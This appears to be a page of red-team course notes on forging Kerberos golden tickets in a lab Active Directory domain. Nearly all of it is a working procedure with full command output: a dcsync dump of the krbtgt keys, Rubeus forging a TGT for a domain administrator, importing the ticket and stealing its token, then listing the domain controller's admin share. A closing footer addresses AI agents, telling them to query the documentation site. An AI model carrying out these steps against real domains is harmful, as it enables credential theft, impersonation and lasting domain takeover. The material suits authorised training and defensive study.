# Golden Tickets A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. Where a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain; and to add insult to injury - the underlying credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently). ``` beacon> dcsync dev.cyberbotic.io DEV\krbtgt * Primary:Kerberos-Newer-Keys * Default Salt : DEV.CYBERBOTIC.IOkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca des_cbc_md5 (4096) : 629189372a372fda ``` \\ ``` PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap [*] Action: Build TGT [*] Building PAC [*] Domain : DEV.CYBERBOTIC.IO (DEV) [*] SID : S-1-5-21-569305411-121244042-2357301523 [*] UserId : 500 [*] Groups : 520,512,513,519,518 [*] ServiceKey : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E [*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] KDCKey : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E [*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256 [*] Service : krbtgt [*] Target : dev.cyberbotic.io [*] Generating EncTicketPart [*] Signing PAC [*] Encrypting EncTicketPart [*] Generating Ticket [*] Generated KERB-CRED [*] Forged a TGT for 'nlamb@dev.cyberbotic.io' [*] AuthTime : 9/9/2022 11:16:23 AM [*] StartTime : 9/9/2022 11:16:23 AM [*] EndTime : 9/9/2022 9:16:23 PM [*] RenewTill : 9/16/2022 11:16:23 AM [*] base64(ticket.kirbi): doIFLz[...]MuaW8= ``` \\ ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8= [*] Using DEV\nlamb:FakePass [*] Showing process : False [*] Username : nlamb [*] Domain : DEV [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 5060 [+] Ticket successfully imported! [+] LUID : 0x449047 beacon> steal_token 5060 beacon> run klist #0> Client: nlamb @ DEV.CYBERBOTIC.IO Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 beacon> ls \\dc-2.dev.cyberbotic.io\c$ [*] Listing: \\dc-2.dev.cyberbotic.io\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 08/15/2022 15:44:08 $Recycle.Bin dir 08/10/2022 04:55:17 $WinREAgent dir 08/10/2022 05:05:53 Boot dir 08/18/2021 23:34:55 Documents and Settings dir 08/19/2021 06:24:49 EFI dir 08/15/2022 16:09:55 inetpub dir 05/08/2021 08:20:24 PerfLogs dir 08/24/2022 10:51:51 Program Files dir 08/10/2022 04:06:16 Program Files (x86) dir 09/05/2022 17:17:48 ProgramData dir 08/15/2022 15:23:23 Recovery dir 08/16/2022 12:37:38 Shares dir 09/05/2022 12:03:43 System Volume Information dir 08/15/2022 15:24:39 Users dir 09/06/2022 15:21:25 Windows 427kb fil 08/10/2022 05:00:07 bootmgr 1b fil 05/08/2021 08:14:33 BOOTNXT 1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req 12kb fil 09/05/2022 07:25:58 DumpStack.log 12kb fil 09/09/2022 09:36:12 DumpStack.log.tmp 384mb fil 09/09/2022 09:36:12 pagefile.sys ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/domain-dominance/golden-tickets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.